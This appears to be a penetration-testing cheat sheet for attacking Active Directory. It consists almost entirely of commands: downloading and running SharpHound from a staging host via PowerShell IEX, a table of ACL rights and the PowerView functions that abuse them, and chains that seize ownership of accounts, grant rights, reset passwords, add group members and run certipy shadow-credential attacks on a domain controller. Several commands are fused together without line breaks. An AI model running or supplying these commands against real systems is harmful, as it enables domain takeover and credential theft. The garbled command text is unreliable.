Bloodhound
SharpHound
IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.10/SharpHound.exe', 'SharpHound.exe')
.\SharpHound.exe --CollectionMethods AllIWR -Uri http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exe.\SharpHound.exe -c All --zipfilename QU35TIEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod AllBloodhound.py
bloodhound.py --zip -c All -d qu35t.pw -u 'qu35t' -p 'Password1!' -ns 172.17.0.3 ACL Abuse
Object
Abused with
ForceChangePassword
Set-DomainUserPassword
Add Members
Add-DomainGroupMember
GenericAll
Set-DomainUserPassword / Add-DomainGroupMember
GenericWrite
Set-DomainObject
WriteOwner
Set-DomainObjectOwner
WriteDACL
Add-DomainObjectACL
AllExtendedRights
Set-DomainUserPassword / Add-DomainGroupMember
Addself
Add-DomainGroupMember
Via Windows :
net group backups qu35t /addSet-DomainObjectOwner -identity jeff -OwnerIdentity qu35t
Add-DomainObjectAcl -TargetIdentity jeff -PrincipalIdentity qu35t -Rights ResetPassword
$cred = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -force
Set-DomainUserPassword -identity jeff -accountpassword $credgetTGT.py qu35t.pw/qu35t
KRB5CCNAME=qu35t.ccache dacledit.py -k -no-pass -dc-ip 10.10.10.10 -principal qu35t -target "Network Audit" -action write -rights FullControl qu35t.pw/qu35tnet rpc group addmem "Network Audit" -k -U qu35t -S qu35t.pw qu35tKRB5CCNAME=qu35t.ccache certipy shadow auto -k -no-pass -u qu35t.pw/[email protected] -dc-ip 10.10.10.10 -target dc.qu35t.pw --account yakeiLast updated